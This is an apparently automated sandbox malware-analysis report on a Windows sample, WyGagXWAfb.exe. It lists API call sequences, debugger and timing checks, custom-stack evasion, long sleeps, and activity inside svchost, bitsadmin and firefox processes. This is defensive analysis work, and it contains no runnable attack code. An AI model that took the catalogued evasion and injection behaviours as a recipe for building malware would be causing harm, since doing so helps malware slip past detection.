Source:	Binary string: wntdll.pdbUGP source: WyGagXWAfb.exe, 00000000.00000003.1697975405.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, WyGagXWAfb.exe, 00000000.00000003.1702619340.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2254591162.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2156144226.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2254591162.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2158058330.0000000003100000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925589029.0000000000C7E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925589029.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2254436134.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2257012523.0000000000933000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: WyGagXWAfb.exe, 00000000.00000003.1697975405.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, WyGagXWAfb.exe, 00000000.00000003.1702619340.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2254591162.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2156144226.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2254591162.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2158058330.0000000003100000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925589029.0000000000C7E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925589029.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2254436134.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2257012523.0000000000933000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.000000000664C000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2924787336.0000000000692000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2558170821.000000001663C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.000000000664C000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2924787336.0000000000692000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2558170821.000000001663C000.00000004.80000000.00040000.00000000.sdmp

Source: WyGagXWAfb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WyGagXWAfb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WyGagXWAfb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WyGagXWAfb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WyGagXWAfb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B8C304 LoadLibraryA,GetProcAddress,

0_2_00B8C304

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B78719 push FFFFFF8Bh; iretd	0_2_00B7871B
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3E94F push edi; ret	0_2_00B3E951
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3EA68 push esi; ret	0_2_00B3EA6A
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B38B85 push ecx; ret	0_2_00B38B98
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3EC43 push esi; ret	0_2_00B3EC45
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3ED2C push edi; ret	0_2_00B3ED2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040500E pushad ; ret	1_2_0040500F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004190BE push ss; retf	1_2_004190BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004031D0 push eax; ret	1_2_004031D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004142F2 push edx; iretd	1_2_00414317
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417307 pushad ; iretd	1_2_0041730F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417BFA push edx; retf	1_2_00417C1B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401F21 push ss; retf	1_2_00401F29
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033309AD push ecx; mov dword ptr [esp], ecx	1_2_033309B6

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B14A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00B14A35
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00B955FD

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00B333C7

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	API/Special instruction interceptor: Address: 1E93224
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0337096E rdtsc

1_2_0337096E

Source: C:\Windows\SysWOW64\bitsadmin.exe	Window / User API: threadDelayed 4272			Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Window / User API: threadDelayed 5702			Jump to behavior

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	API coverage: 4.3 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe TID: 3096	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 736	Thread sleep count: 4272 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 736	Thread sleep time: -8544000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 736	Thread sleep count: 5702 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 736	Thread sleep time: -11404000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B74696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B74696
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B7C9C7
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7C93C FindFirstFileW,FindClose,	0_2_00B7C93C
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B7F200
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B7F35D
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B7F65E
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B73A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B73A2B
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B73D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B73D4E
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B7BF27

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B14AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B14AFE

Source: bitsadmin.exe, 00000006.00000002.2924787336.0000000000692000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2924988857.000000000080E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2559881002.00000213D662C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0337096E rdtsc

1_2_0337096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417AD3 LdrLoadDll,

1_2_00417AD3

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B841FD BlockInput,

0_2_00B841FD

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B13B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00B13B4C

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B45CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00B45CCC

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B8C304 LoadLibraryA,GetProcAddress,

0_2_00B8C304

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_01E934F0 mov eax, dword ptr fs:[00000030h]	0_2_01E934F0
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_01E93490 mov eax, dword ptr fs:[00000030h]	0_2_01E93490
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_01E91E70 mov eax, dword ptr fs:[00000030h]	0_2_01E91E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C310 mov ecx, dword ptr fs:[00000030h]	1_2_0332C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03350310 mov ecx, dword ptr fs:[00000030h]	1_2_03350310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]	1_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]	1_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]	1_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D437C mov eax, dword ptr fs:[00000030h]	1_2_033D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]	1_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]	1_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]	1_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B035C mov ecx, dword ptr fs:[00000030h]	1_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]	1_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]	1_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FA352 mov eax, dword ptr fs:[00000030h]	1_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D8350 mov ecx, dword ptr fs:[00000030h]	1_2_033D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]	1_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]	1_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]	1_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]	1_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]	1_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]	1_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]	1_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]	1_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]	1_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033663FF mov eax, dword ptr fs:[00000030h]	1_2_033663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]	1_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]	1_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]	1_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]	1_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]	1_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]	1_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]	1_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]	1_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]	1_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]	1_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]	1_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]	1_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]	1_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EC3CD mov eax, dword ptr fs:[00000030h]	1_2_033EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0333A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]	1_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]	1_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]	1_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]	1_2_033383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B63C0 mov eax, dword ptr fs:[00000030h]	1_2_033B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332823B mov eax, dword ptr fs:[00000030h]	1_2_0332823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]	1_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]	1_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]	1_2_03334260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332826B mov eax, dword ptr fs:[00000030h]	1_2_0332826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A250 mov eax, dword ptr fs:[00000030h]	1_2_0332A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336259 mov eax, dword ptr fs:[00000030h]	1_2_03336259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]	1_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]	1_2_033EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B8243 mov eax, dword ptr fs:[00000030h]	1_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B8243 mov ecx, dword ptr fs:[00000030h]	1_2_033B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]	1_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]	1_2_033402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]	1_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]	1_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]	1_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]	1_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]	1_2_033C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]	1_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]	1_2_0336E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]	1_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]	1_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]	1_2_033B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]	1_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]	1_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]	1_2_033402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0333A2C3
